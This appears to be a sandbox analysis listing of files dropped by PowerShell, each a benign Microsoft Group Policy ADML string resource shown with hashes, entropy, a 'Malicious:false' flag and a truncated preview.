                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableSensors">Turn off sensors</string>.. <string id="DisableSensors_Explain">.. This policy setting turns off the sensor feature for this computer..... If you enable this policy setting, the sensor feature is turned off, and all programs on this computer cannot use the sensor feature..... If you disable or do not configure this policy setting, all programs on this computer can use the sensor feature... </string>.. <string id="DisableLocation">Turn off location</string>..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (387), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4955
                                                                                          Entropy (8bit):4.805565480068189
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmHhpF4FGEkPDY1o1NucOc3EfqYz0LYS0zYS0jfBQ3V:E2hpi4rPE1o1NudbrUMqfBQF
                                                                                          MD5:65C390CEDEDFD130518B61FA1235250A
                                                                                          SHA1:6A55E7AC36FE463A16AF0BE1F7F8B5C1848C0D97
                                                                                          SHA-256:E47082B33ACA0FB727E6486ECA05ED0F7E309923D214DF7D6D1E9E1BB6B58A93
                                                                                          SHA-512:FAC7D91F8DAE73E2719FE7D9E8BDAE71A4B3DD4375943DA8F0B9992E4554E0E95A503BB5F5EEAC6E6475209F9051B343D2928D028A3355EA58F987DD76ADD03D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008OrWindowsServer2008R2Only">Windows Server 2008 and Windows Server 2008 R2 operating systems only</string>.. <string id="DoNotLaunchServerManager">Do not display Server Manager automatically at logon</string>.. <string id="DoNotLaunchServerManagerHelp">This policy setting allows you to turn off the automatic display of Server Manager at logon.....If you enable this policy setting, Server Manager is not displayed automatically when a user logs on to the server.....If you disable t
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (408), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2386
                                                                                          Entropy (8bit):4.892231615075483
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cs+D5p8lF9YGTBdVhcNZPhcNspL8K5pWNLcrdYAkWQ/tgiwavEARV:P+D5iF9YGTnVhcNhhcNspL8KiNFBWQ/P
                                                                                          MD5:C16E4D55B366521038B07E5B2EAA4D1A
                                                                                          SHA1:C8FA7021E315736D6ED23ACA59D8B0CC3460FDD2
                                                                                          SHA-256:0FB29A9479B51033FDE4838E9E61D1D382B173EF4F43C00799EF97940F0E498C
                                                                                          SHA-512:9DC2BFAAE5885EE74E4AB8C7E9D0B6557550F8E6315199F23006F202AA234244CA1802D2D289F95E3213CA577DBD14D7D086CED34BDE2349C127CB31141E2512
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Servicing Policies</displayName>.. <description>Windows Servicing Policies</description>.. <resources>.. <stringTable>.. <string id="CloudFulfillmentGPO">Specify settings for optional component installation and component repair</string>.. <string id="CloudFulfillmentGPOExplanation">..This policy setting specifies the network locations that will be used for the repair of operating system corruption and for enabling optional features that have had their payload files removed.....If you enable this policy setting and specify the new location, the files in that location will be used to repair operating system corruption and for enabling
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):9740
                                                                                          Entropy (8bit):4.723278539465857
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:PD5pmpC5ZTUe/5edwuTysvjk9yGfUqWxOV:ftHUwueIjkkGfnWw
                                                                                          MD5:A46525DCC0BBEFF3717004AA7D5E686B
                                                                                          SHA1:85429467F34FFB172D7E404E60542C50090C6AFE
                                                                                          SHA-256:044A3C384EC4E46E9EE6AA4BF4D28F3027A758DE7A9163324FE80EE466E935E5
                                                                                          SHA-512:551C90AD33D7ECBE6E0D45B1FF22ED092C239EFC63189D7D0E0FF1147E82C3694ECE958DF4DF5A89F87E4CE966284D9317CEE93D6F38B76152ED26A3D2DC54A0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. General -->.. <string id="SettingSyncCategory">Sync your settings</string>.... Main policy -->.. <string id="DisableSettingSync">Do not sync</string>.. <string id="DisableSettingSync_Help">Prevent syncing to and from this PC. This turns off and disables the "sync your settings" switch on the "sync your settings" page in PC Settings.....If you enable this policy setting, "sync your settings" will be turned off, and none of the "sync your setting" groups will be synced on this PC.....Use the option
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2060
                                                                                          Entropy (8bit):4.847450101986129
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ybvkTvKvkTlE6OmYyfbTebTlCa/Yi7R0ryMOVjoV:cgeD5x8gm8fKnxRRxYEbQRj/Yi7S0oV
                                                                                          MD5:9940A876376DFACA4C22AEB49D5E98D1
                                                                                          SHA1:4092EC36B7F64EB2D076D11F04AFBB38C95A9AEB
                                                                                          SHA-256:F0AF5022E574F037FEFF288B1944788E08E9F1C3CC29E2968022B05EE8A12D71
                                                                                          SHA-512:DE5BF65874ABDF5AF96EA22C5D97170AE5B3312B39A2FB3C19F1E33D0A7AC71F2633510E2CE1C87794FE818CD50DA4FB2D328E69C1E0005D9C8D86B96A88C1D8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ServicePackSourcePath">Specify Windows Service Pack installation file location</string>.. <string id="ServicePackSourcePath_Help">Specifies an alternate location for Windows Service Pack installation files.....If you enable this policy setting, enter the fully qualified path to the new location in the "Windows Service Pack Setup file path" box.....If you disable or do not configure this policy setting, the Windows Service Pack Setup source path will be the location used during the last time Windows Service Pac
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1850
                                                                                          Entropy (8bit):4.859149246040625
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKgJxujBDrfS1Z/yqqqYu5BV5ocfS1Z/MFV:LeD5pmCeKV4JcKVMFV
                                                                                          MD5:B512AC9CA34BC2605D206FA9D22778F1
                                                                                          SHA1:21E31C62BA3B2E963A2A78B9490270D87E14F082
                                                                                          SHA-256:3649D182A6D570C693D564E11B80127960E3F34BD98C2DABC5E5A1F640B7EACF
                                                                                          SHA-512:2F726D9A4E067AC354A7C6E5EC36EC5973CD04731E4A14DF3DE30061447A077F38F8B4752112E0DB0BA3E1DACCB6A0C98F148F4FB00FCBEE07B6D6A7206020F0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PublishDfsRoots">Allow DFS roots to be published</string>.. <string id="PublishDfsRoots_Help">This policy setting determines whether the user can publish DFS roots in Active Directory Domain Services (AD DS).....If you enable or do not configure this policy setting, users can use the "Publish in Active Directory" option to publish DFS roots as shared folders in AD DS .....If you disable this policy setting, users cannot publish DFS roots in AD DS and the "Publish in Active Directory" option is disabled. Note:
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (372), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2463
                                                                                          Entropy (8bit):4.766622027240466
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKMQ44nWQqxjgwrGOnLbvE4juaM8oFV:LeD5pmdpMGOnN6aM8oFV
                                                                                          MD5:F76CBCDF77EAC5FEF366F9F9D45F5E76
                                                                                          SHA1:89F54964A2B4E1DE63448AADFCC678470886DDAF
                                                                                          SHA-256:56D6E0E7FD98836C698D345735B4F7633DF49C455500C41B20E7B5D6FDF40AB3
                                                                                          SHA-512:D86BB5E1DA555D6F09FEA4E3C930AE560E777F64B0C38A225201CC401869A82A0A05A5C3E874310C1F4C0BA33F131B607CBA7DAB8BE61AC247F44CCB080401D2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoInplaceSharing">Prevent users from sharing files within their profile.</string>.. <string id="NoInplaceSharing_Help">This policy setting specifies whether users can share files within their profile. By default users are allowed to share files within their profile to other users on their network after an administrator opts in the computer. An administrator can opt in the computer by using the sharing wizard to share a file within their profile.....If you enable this policy setting, users cannot share files w
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5239
                                                                                          Entropy (8bit):4.777406183575808
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmrH1U680U30fNS57tc/Ja80+fgT9lsc/osa80+fVxV:EYU6xU3RtckQ0zscCQVT
                                                                                          MD5:3925D35054AB425A8F3690C2FA33BDFC
                                                                                          SHA1:A2DFC384B4F8351B40B9406A94ADEFB1B85F9C7B
                                                                                          SHA-256:BEC7CF7EC0CDFD01BB8677C20C887988A642742F136C0437D49A67F218087842
                                                                                          SHA-512:AE7CABBE1C4E7618E787F9D3BDB621CB32E99F5802114A20BCF6ADA2E7B52F7EE12556E8023B38142FF42EA580624DAB40D988B23AEE4BB4BB9E2A8905B175D1
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableCMD">Prevent access to the command prompt</string>.. <string id="DisableCMD_Help">This policy setting prevents users from running the interactive command prompt, Cmd.exe. This policy setting also determines whether batch files (.cmd and .bat) can run on the computer.....If you enable this policy setting and the user tries to open a command window, the system displays a message explaining that a setting prevents the action.....If you disable this policy setting or do not configure it, users can run Cmd.
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1034
                                                                                          Entropy (8bit):4.934703334666594
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8Cnid3PRM5LDa3IQWFV:cgeD5x8gm8fK4IPRMNe3IQWFV
                                                                                          MD5:E1C3A48A813C8E8D7F076966FFF1782F
                                                                                          SHA1:E678B2457A0B3D7FA37C25899823E1DCBF335552
                                                                                          SHA-256:778A48685463098ECBAB0E95EC4BA4CC299704453A10B790404D636C78495A6F
                                                                                          SHA-512:E7B2002E5ABEDBC1C2E877143F6296A060FF2BE18CDF9743119F068CBA422A4D4B502E7E69DCABA5D1A5BBB20E42D9EA978479A3A996040E4F9CC5413F1E1F5E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RestrictWelcomeCenter">Do not display the Welcome Center at user logon</string>.. <string id="RestrictWelcomeCenter_Help">This policy setting prevents the display of the Welcome Center at user logon.....If you enable this policy setting, the Welcome Center is not displayed at user logon. The user can access the Welcome Center using the Control Panel or Start menu.....If you disable or do not configure this policy setting, the Welcome Center is displayed at user logon.</string>.. </stringTable>.. </resource
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2181
                                                                                          Entropy (8bit):4.808024425882859
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Sidebar">Desktop Gadgets</string>.. <string id="TurnOffSidebar">Turn off desktop gadgets</string>.. <string id="TurnOffSidebar_Explain">This policy setting allows you to turn off desktop gadgets. Gadgets are small applets that display information or utilities on the desktop.....If you enable this setting, desktop gadgets will be turned off.....If you disable or do not configure this setting, desktop gadgets will be turned on.....The default is for desktop gadgets to be turned on.</string>.. <string
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (698), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3086
                                                                                          Entropy (8bit):4.858829936806005
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Prevent OneDrive file sync</displayName>.. <description>Prevent files from being automatically synced to OneDrive</description>.. <resources>.. <stringTable>.. general -->.. <string id="SkydriveSettingCategory">OneDrive</string>.. .. prevent file sync-->.. <string id="PreventSkydriveFileSync">Prevent the usage of OneDrive for file storage</string>.. <string id="PreventSkydriveFileSync_help">This policy setting lets you prevent apps and features from working with files on OneDrive...If you enable this policy setting:....* Users can.t access OneDrive from the OneDrive app and file picker...* Windows Store apps can.t access OneDrive using the WinRT API...* OneDrive
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (505), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13897
                                                                                          Entropy (8bit):4.622403059025047
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowCertificatesWithNoEKU">Allow certificates with no extended key usage certificate attribute</string>.. <string id="AllowCertificatesWithNoEKU_help">This policy setting lets you allow certificates without an Extended Key Usage (EKU) set to be used for logon.....In versions of Windows prior to Windows Vista, smart card certificates that are used for logon require an enhanced key usage (EKU) extension with a smart card logon object identifier. This policy setting can be used to modify that restriction.....If
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2612
                                                                                          Entropy (8bit):4.846146849523547
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Snis">Server for NIS</string>.. <string id="Snis_LoggingLevel">Turn on extensive logging for Active Directory Domain Services domain controllers that are running Server for NIS</string>.. <string id="Snis_LoggingLevel_Help">This policy setting allows an administrator to configure extensive logging for computers that are running Server for Network Information Service (NIS).....If you enable this policy setting, intermediate steps of NIS map updates or propagations, and whether map updates are successful, a
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5042
                                                                                          Entropy (8bit):4.799259798850357
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SNMP_Communities">Specify communities</string>.. <string id="SNMP_PermittedManagers">Specify permitted managers</string>.. <string id="SNMP_PermittedManagers_Help">This policy setting determines the permitted list of hosts that can submit a query to the Simple Network Management (SNMP) agent running on the client computer.....Simple Network Management Protocol is a protocol designed to give a user the capability to remotely manage a computer network by polling and setting terminal values and monitoring ne
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1152
                                                                                          Entropy (8bit):4.968946981075251
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Soundrec_DiableApplication_TitleText">Do not allow Sound Recorder to run</string>.. <string id="Soundrec_DisableApplication_DescriptionText">Specifies whether Sound Recorder can run.....Sound Recorder is a feature of Microsoft Windows Vista that can be used to record sound from an audio input device where the recorded sound is encoded and saved as an audio file.....If you enable this policy setting, Sound Recorder will not run.....If you disable or do not configure this policy setting, Sound Recorder can be ru
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):54118
                                                                                          Entropy (8bit):4.666836415862256
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ClearRecentProgForNewUserInStartMenu">Clear the recent programs list for new users</string>.. <string id="ClearRecentProgForNewUserInStartMenu_Help">If you enable this policy setting, the recent programs list in the start menu will be blank for each new user.....If you disable or do not configure this policy, the start menu recent programs list will be pre-populated with programs for each new user.</string>.. <string id="NoGamesFolderOnStartMenu">Remove Games link from Start Menu</string>.. <string i
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2647
                                                                                          Entropy (8bit):4.731629807407312
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SR">System Restore</string>.. <string id="SR_DisableConfig">Turn off Configuration</string>.. <string id="SR_DisableConfig_Help">Allows you to disable System Restore configuration through System Protection.....This policy setting allows you to turn off System Restore configuration through System Protection.....System Restore enables users, in the event of a problem, to restore their computers to a previous state without losing personal data files. The behavior of this policy setting depends on the "Turn o
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (751), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19376
                                                                                          Entropy (8bit):4.677466344688263
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of Trusted Platform Module (TPM) owner information. ....TPM owner information includes a cryptographic hash of the TPM owner password. Certain TPM commands can only be run by the TPM owner. This hash authorizes the TPM to run these commands. ....If you enable this policy setting, TPM owner information will be automatically and silently backed up to AD DS when you use Windows to set or change a TP
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (416), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14958
                                                                                          Entropy (8bit):4.684169671948835
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoComplete">Turn off AutoComplete integration with Input Panel</string>.. <string id="AutoCompleteExplain">Turns off the integration of application auto complete lists with Tablet PC Input Panel in applications where this behavior is available.....Tablet PC Input Panel is a Tablet PC accessory that enables you to use handwriting or an on-screen keyboard to enter text, symbols, numbers, or keyboard shortcuts.....If you enable this policy, application auto complete lists will never appear next to Input Panel.
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (546), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6673
                                                                                          Entropy (8bit):4.787936688249674
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Accessories">Accessories</string>.. <string id="Cursors">Cursors</string>.. <string id="DisableInkball">Do not allow Inkball to run</string>.. <string id="DisableInkball_Help">Prevents start of InkBall game.....If you enable this policy, the InkBall game will not run.....If you disable this policy, the InkBall game will run.....If you do not configure this policy, the InkBall game will run.</string>.. <string id="DisableJournal">Do not allow Windows Journal to be run</string>.. <string id="
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (579), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7038
                                                                                          Entropy (8bit):4.643182607339355
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBrowse">Prohibit Browse</string>.. <string id="AllowBrowseHelp">Limits newly scheduled to items on the user's Start menu, and prevents the user from changing the scheduled program for existing tasks.....This setting removes the Browse button from the Schedule Task Wizard and from the Task tab of the properties dialog box for a task. Also, users cannot edit the "Run" box or the "Start in" box that determine the program and path for a task.....As a result, when users create a task, they must select a progra
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (325), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):11395
                                                                                          Entropy (8bit):4.633029483097701
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EytLqsKeNTdPL5M8R1QfkSK1GOROjzazDzLh5/Cbl4Zgx9IQCmJwgjRLEJn:zM8R1QiGwCCDhtS41
                                                                                          MD5:B04329C131F6270E21143E3A48884E73
                                                                                          SHA1:21A2CA3E301813810D7B3874D625C4FABC5DD96A
                                                                                          SHA-256:17A7E0C29F6FAD55F06306ECE4251A6BF7D40BB30C3178385D01CFFC805A1164
                                                                                          SHA-512:E50307FA3358D4CAC0C2CE8C5DFD568DDC0795E07DD38A5F655C6BF0F2F071B8D5479D6F89483959054B7256E0BCB09631F8E902B64F0F19CBB051030815633E
                                                                                          Malicious:false
